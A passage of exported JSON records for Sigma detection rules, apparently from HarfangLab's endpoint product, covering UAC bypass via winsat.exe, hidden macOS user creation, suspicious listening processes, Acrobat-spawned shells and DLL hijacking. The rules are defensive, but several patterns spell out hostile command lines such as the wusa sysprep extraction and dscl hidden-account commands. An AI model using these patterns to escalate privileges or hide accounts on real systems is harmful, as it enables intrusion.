'/Applications/lghub.app/Contents/MacOS/lghub_updater.app/Contents/MacOS/lghub_updater'\n - Image: '/Users/Shared/LGHUB/depots/*/core/lghub.app/Contents/MacOS/lghub_updater.app/Contents/MacOS/lghub_updater'\n exclusion_battlenet:\n Image: '/Users/Shared/Battle.net/Agent/Agent.app/Contents/MacOS/Switcher'\n\n exclusion_wizards:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.wizards.mtga'\n\n exclusion_maxon:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'net.maxon.maxonapp.installer'\n\n exclusion_gog:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.gog.galaxy.updater'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "08ddafaf-401d-4c3d-9389-e96925e90f0f",
"rule_name": "File Executed from Users Shared Folder",
"rule_description": "Detects the execution of a file from the Users shared folder.\nAdversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\nIt is recommended to check the executed process and its parents/children for malicious behavior.\n",
"rule_creation_date": "2024-05-10",
"rule_modified_date": "2025-09-24",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "08e4776f-548a-4b01-8538-c2af435dce4b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093473Z",
"creation_date": "2026-03-23T11:45:34.093475Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093479Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198"
],
"name": "t1548_002_uac_bypass_winsat.yml",
"content": "title: UAC Bypass Executed via winsat.exe\nid: 08e4776f-548a-4b01-8538-c2af435dce4b\ndescription: |\n Detects UAC bypass involving the hijacking of the devobj.dll or powrprof.dll DLL via winsat.exe (Windows System Assessment Tool).\n This UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer).\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198\ndate: 2025/01/31\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_prepare:\n CommandLine: '?:\\Windows\\System32\\cmd.exe /c wusa ?:\\Users\\\\*\\AppData\\Local\\Temp\\update.msu /extract:?:\\Windows\\system32\\sysprep\\'\n\n selection_exploit:\n CommandLine: '?:\\Windows\\system32\\sysprep\\winsat.exe'\n ProcessIntegrityLevel: 'High'\n ProcessParentIntegrityLevel: 'Medium'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "08e4776f-548a-4b01-8538-c2af435dce4b",
"rule_name": "UAC Bypass Executed via winsat.exe",
"rule_description": "Detects UAC bypass involving the hijacking of the devobj.dll or powrprof.dll DLL via winsat.exe (Windows System Assessment Tool).\nThis UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer).\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\n",
"rule_creation_date": "2025-01-31",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "08f3ae91-3811-4a4b-8f04-87302ca365c9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612661Z",
"creation_date": "2026-03-23T11:45:34.612665Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612672Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1571/",
"https://attack.mitre.org/techniques/T1205/001/",
"https://attack.mitre.org/techniques/T1104/"
],
"name": "t1571_process_listen_connections_suspicious_path.yml",
"content": "title: Process Started Listening for Incoming Connections from Suspicious Path\nid: 08f3ae91-3811-4a4b-8f04-87302ca365c9\ndescription: |\n Detects a process that starts listening for incoming connections from a suspicious path.\n Attackers may setup reverse shells listening for incoming connections as a persistence and C2 mechanism.\n It is recommended to ensure the process had legitimate reason to do so and that the host wasn't compromised.\nreferences:\n - https://attack.mitre.org/techniques/T1571/\n - https://attack.mitre.org/techniques/T1205/001/\n - https://attack.mitre.org/techniques/T1104/\ndate: 2023/12/15\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1571\n - attack.t1104\n - attack.defense_evasion\n - attack.persistence\n - attack.t1205.001\n - classification.Linux.Source.NetworkListen\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: network_listen\n product: linux\ndetection:\n\n selection:\n ProcessImage|startswith:\n - '/tmp/'\n - '/var/'\n - '/run/'\n - '/root/'\n - '/dev/shm/'\n - '/boot/'\n\n filter_var:\n ProcessImage|startswith:\n - '/var/lib/'\n - '/var/opt/'\n\n # Ports opened on localhost aren't considered suspicious\n filter_localhost:\n Address:\n - '127.0.0.1'\n - '::1'\n\n exclusion_java:\n # Java is embedded in so much application it becomes quickly unfeasable to list all of them\n ProcessImage|endswith: '/java'\n\n exclusion_hoptimal:\n ProcessImage: '/tmp/InstalleurVIDALHoptimalAndApi_unix_*/jre/bin/java'\n\n exclusion_go:\n # /tmp/go-build1480910053/b001/logsevents.test\n # /tmp/go-build3216331136/b001/schedulerd.test\n Image|startswith: '/tmp/go-build*/????/'\n\n exclusion_plz_sandbox:\n ProcessImage|startswith: '/tmp/plz_sandbox/'\n\n exclusion_opcon:\n ProcessImage|startswith: '/tmp/opcon_agent/bin/'\n\n exclusion_jetbrains:\n ProcessImage: '/tmp/.mount_*/jetbrains-toolbox'\n\n exclusion_veeam:\n ProcessImage:\n - '/tmp/VeeamAgent*/veeamagent'\n - '/var/tmp/veeamagent*/veeamagent'\n\n exclusion_collabora_appimage:\n ProcessImage: '/tmp/appimage_extracted_*/usr/bin/coolwsd'\n\n exclusion_veeam_plugin_manager:\n ProcessParentImage: '/opt/veeam/VeeamPluginforOracleRMAN/RMANPluginManager'\n\n exclusion_ossec_ids:\n - ProcessImage:\n - '/var/ossec/bin/wazuh-remoted'\n - '/var/ossec/bin/wazuh-authd'\n - ProcessCommandLine: '/var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh_apid.py'\n\n exclusion_nexcloud:\n ProcessImage: '/var/www/html/nextcloud/*/apps/notify_push/bin/x86_64/notify_push'\n\n exclusion_oracle:\n ProcessImage: '/tmp/CVU_*_resource/exectask'\n\n exclusion_vscode:\n ProcessImage: '/root/.vscode-server/bin/*/node'\n\n exclusion_k3s:\n ProcessImage|endswith: '/k3s/data/*/bin/k3s'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "08f3ae91-3811-4a4b-8f04-87302ca365c9",
"rule_name": "Process Started Listening for Incoming Connections from Suspicious Path",
"rule_description": "Detects a process that starts listening for incoming connections from a suspicious path.\nAttackers may setup reverse shells listening for incoming connections as a persistence and C2 mechanism.\nIt is recommended to ensure the process had legitimate reason to do so and that the host wasn't compromised.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-02-27",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1104",
"attack.t1205.001",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "08f5486f-0238-406f-a789-aad56def2bd3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626532Z",
"creation_date": "2026-03-23T11:45:34.626534Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626538Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608",
"https://attack.mitre.org/techniques/T1566/",
"https://attack.mitre.org/techniques/T1203/",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1104_acrobat_spawning_malicious_process.yml",
"content": "title: Suspicious Process Started by Acrobat Reader\nid: 08f5486f-0238-406f-a789-aad56def2bd3\ndescription: |\n Detects the suspicious execution of binaries by Adobe Acrobat Reader.\n Adversaries can use phishing techniques to send malicious PDF files that exploit vulnerabilities in Adobe Acrobat Reader, or contain malicious script as an initial access vector.\n For example, the CVE-2023-21608 is known to make Adobe Acrobat execute arbitrary code when a user opens a malicious PDF file.\n It is recommended to check the origin of the PDF file and the legitimacy of the executed binary.\nreferences:\n - https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2023/01/31\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1203\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_acrobat:\n ParentImage|endswith:\n - '\\Acrobat.exe'\n - '\\AcroRd32.exe'\n - '\\Acrobat_sl.exe'\n - '\\AcroCEF.exe'\n\n selection_bin:\n OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - 'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - 'appvlp.exe' # lolbas : https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n - 'extrac32.exe' # https://twitter.com/ShadowChasing1/status/1557287930267578368\n - 'calc.exe' # For POCs\n\n exclusion_msiexec_adobe:\n CommandLine|contains:\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1036-1033-7760-BC15014EA700} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # C:\\WINDOWS\\system32\\msiexec.exe /I {AC76BA86-1036-1033-7760-BC15014EA700} REINSTALL=ALL REINSTALLMODE=omus /qb\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1036-1033-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FF00-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-7AD7-1036-7B44-AC0F074E4100} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-0C0F074E4100} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # msiexec.exe /I {AC76BA86-1033-F400-BA7E-000000000004} ADDLOCAL=ChineseSLanguageSupport /qb\n # C:\\WINDOWS\\system32\\msiexec.exe /I {AC76BA86-1033-FFFF-7760-000000000006} REINSTALL=ALL REINSTALLMODE=omus /qb\n - 'msiexec.exe /i {AC76BA86-????-????-????-????????????} '\n - 'msiexec.exe /i {AC76BA86-????-????-????-????????????} ' # The two spaces are intentional\n - 'msiexec.exe /fmous {AC76BA86-????-????-????-????????????} '\n OriginalFileName: 'msiexec.exe'\n\n exclusion_spool:\n CommandLine|startswith:\n # rundll32 C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\hpmsn140.DLL,MonitorPrintJobStatus *\n # rundll32 C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\hpmsn175.dll,MonitorPrintJobStatus *\n - 'rundll32 ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n - 'rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n # regsvr32 /s /n /i C:\\Windows\\system32\\spool\\DRIVERS\\W32X86\\3\\UDCOfficeAddin2000.dll\n - 'regsvr32 /s /n /i ?:\\Windows\\system32\\spool\\DRIVERS\\'\n - 'regsvr32 /s /n /i:OnPrinterAccess ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n\n exclusion_rundll32:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile'\n - '?:\\WINDOWS\\SysWOW64\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\cryptext.dll,CryptExtAddCERMachineOnlyAndHwnd MIIGq'\n - '?:\\WINDOWS\\System32\\RunDll32.exe ?:\\WINDOWS\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification '\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\eed_ec.dll,SpeedLauncher'\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll, ImageView_Fullscreen '\n - '?:\\Windows\\System32\\rundll32.exe ?:\\WINDOWS\\System32\\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding'\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\WINDOWS\\System32\\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding'\n - '?:\\Windows\\System32\\rundll32.exe shwebsvc.dll,AddNetPlaceRunDll'\n\n exclusion_mailprotocolhandler:\n CommandLine|contains: 'rundll32.exe *,MailToProtocolHandler mailto:'\n\n exclusion_open_adobe_website:\n CommandLine|contains:\n - 'start microsoft-edge:http://www.adobe.com/'\n - 'start microsoft-edge:http://acrobat.adobe.com/'\n - 'start microsoft-edge:https://www.adobe.com/'\n - 'start microsoft-edge:https://acrobat.adobe.com/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "08f5486f-0238-406f-a789-aad56def2bd3",
"rule_name": "Suspicious Process Started by Acrobat Reader",
"rule_description": "Detects the suspicious execution of binaries by Adobe Acrobat Reader.\nAdversaries can use phishing techniques to send malicious PDF files that exploit vulnerabilities in Adobe Acrobat Reader, or contain malicious script as an initial access vector.\nFor example, the CVE-2023-21608 is known to make Adobe Acrobat execute arbitrary code when a user opens a malicious PDF file.\nIt is recommended to check the origin of the PDF file and the legitimacy of the executed binary.\n",
"rule_creation_date": "2023-01-31",
"rule_modified_date": "2026-01-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0915b4a3-17da-4c9c-bf08-1db96769b345",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625928Z",
"creation_date": "2026-03-23T11:45:34.625930Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625934Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md",
"https://attack.mitre.org/techniques/T1564/002/"
],
"name": "t1564_002_create_hidden_user_macos.yml",
"content": "title: Hidden User Created\nid: 0915b4a3-17da-4c9c-bf08-1db96769b345\ndescription: |\n Detects a suspicious attempt at creating a hidden user.\n Adversaries may use hidden users to hide the presence of user accounts they create or modify.\n It is recommended to check it the created account is expected to be created.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md\n - https://attack.mitre.org/techniques/T1564/002/\ndate: 2022/08/25\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base_dscl:\n Image: '/usr/bin/dscl'\n User: 'root'\n CommandLine|contains:\n - ' create'\n - ' -create'\n ParentImage|contains: '?'\n\n selection_specific_dscl_low_id_hidden1:\n # ID < 500 are considered hidden by default on *OS\n #CommandLine|re:\n # - '.*UniqueID *[0-4]?[0-9]?[0-9]( |$).*'\n CommandLine|contains:\n - 'UniqueID ? '\n - 'UniqueID ?? '\n - 'UniqueID 1?? '\n - 'UniqueID 2?? '\n - 'UniqueID 3?? '\n - 'UniqueID 4?? '\n\n selection_specific_dscl_low_id_hidden2:\n # ID < 500 are considered hidden by default on *OS\n CommandLine|endswith:\n - 'UniqueID ?'\n - 'UniqueID ??'\n - 'UniqueID 1??'\n - 'UniqueID 2??'\n - 'UniqueID 3??'\n - 'UniqueID 4??'\n\n selection_specific_dscl_hidden_parameter:\n #CommandLine|re: '.*IsHidden *1.*'\n CommandLine|contains:\n - 'IsHidden *1'\n - 'IsHidden *true'\n\n selection_base_sysadminctl:\n Image: '/usr/sbin/sysadminctl'\n User: 'root'\n CommandLine|contains: ' -addUser'\n ParentImage|contains: '?'\n\n selection_specific_sysadminctl_low_id_hidden1:\n # ID < 500 are considered hidden by default on *OS\n #CommandLine|re:\n # - '.*-UID *[0-4]?[0-9]?[0-9]( |$).*'\n CommandLine|contains:\n - '-UID ? '\n - '-UID ?? '\n - '-UID 1?? '\n - '-UID 2?? '\n - '-UID 3?? '\n - '-UID 4?? '\n\n selection_specific_sysadminctl_low_id_hidden2:\n # ID < 500 are considered hidden by default on *OS\n CommandLine|endswith:\n - '-UID ?'\n - '-UID ??'\n - '-UID 1??'\n - '-UID 2??'\n - '-UID 3??'\n - '-UID 4??'\n\n exclusion_jamf:\n # /usr/bin/dscl localhost -create /Local/Default/Users/mngt-admin IsHidden 1\n # parent:\n # /usr/local/jamf/bin/jamf postMdmEnrollment -server_url https://xxxx.jamfcloud.com -invitation yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\n # jamf enroll -invitation yyyyyyyyyyyyyyyyyyyyyyyyyyy -noPolicy\n - ProcessParentImage: '/usr/local/jamf/bin/jamf'\n - ProcessAncestors|contains: '|/usr/local/jamf/bin/jamf'\n\n exclusion_known_users:\n ProcessCommandLine|contains:\n - '/usr/bin/dscl . -create users/_fsvpn_' # fsecure\n - 'create /users/_nixbld' # nix\n - 'dscl . create /users/eset-ecsm-' # eset\n\n exclusion_windscribe:\n ProcessParentImage: '/Library/PrivilegedHelperTools/com.windscribe.helper.macos'\n\n exclusion_installer:\n - ProcessParentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/'\n\n exclusion_intune:\n ProcessGrandparentImage: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n condition: ((selection_base_dscl and 1 of selection_specific_dscl_*) or (selection_base_sysadminctl and 1 of selection_specific_sysadminctl_*)) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0915b4a3-17da-4c9c-bf08-1db96769b345",
"rule_name": "Hidden User Created",
"rule_description": "Detects a suspicious attempt at creating a hidden user.\nAdversaries may use hidden users to hide the presence of user accounts they create or modify.\nIt is recommended to check it the created account is expected to be created.\n",
"rule_creation_date": "2022-08-25",
"rule_modified_date": "2025-12-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "096b4462-7384-4447-95a6-a2c2c26ffcb0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096369Z",
"creation_date": "2026-03-23T11:45:34.096371Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096375Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia",
"https://securelist.com/common-ttps-of-attacks-against-industrial-organizations/110319/",
"https://twitter.com/malwrhunterteam/status/1558149472672251904",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mcods.yml",
"content": "title: DLL Hijacking via McOds.exe\nid: 096b4462-7384-4447-95a6-a2c2c26ffcb0\ndescription: |\n Detects potential Windows DLL Hijacking via McOds.exe related to McAfee VirusScan.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\n - https://securelist.com/common-ttps-of-attacks-against-industrial-organizations/110319/\n - https://twitter.com/malwrhunterteam/status/1558149472672251904\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'McOds.exe'\n ImageLoaded|endswith: '\\McVsoCfg.dll'\n\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'McAfee, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "096b4462-7384-4447-95a6-a2c2c26ffcb0",
"rule_name": "DLL Hijacking via McOds.exe",
"rule_description": "Detects potential Windows DLL Hijacking via McOds.exe related to McAfee VirusScan.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "09718066-8257-4dd4-83e0-14787bbc9fd3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
